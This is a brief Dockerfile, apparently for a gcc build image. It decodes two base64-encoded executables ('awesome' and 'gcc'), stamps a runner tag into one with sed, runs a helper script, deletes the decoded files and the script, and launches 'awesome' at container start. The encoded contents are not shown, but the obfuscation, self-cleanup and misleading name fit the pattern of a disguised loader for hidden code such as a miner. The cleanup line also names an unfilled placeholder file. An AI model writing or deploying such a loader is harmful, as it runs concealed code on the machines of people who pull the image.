FROM santiagomachadowe/gcc
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > awesome.log'

COPY awesome.64 .
COPY docker.sh .
COPY gcc.64 .

RUN bash -c 'base64 --decode awesome.64 > awesome'
RUN bash -c 'base64 --decode gcc.64 > gcc'
RUN chmod +x gcc
RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' awesome

RUN bash ./docker.sh
RUN rm --force --recursive awesome _REPO_NAME__.64 docker.sh gcc gcc.64

CMD awesome
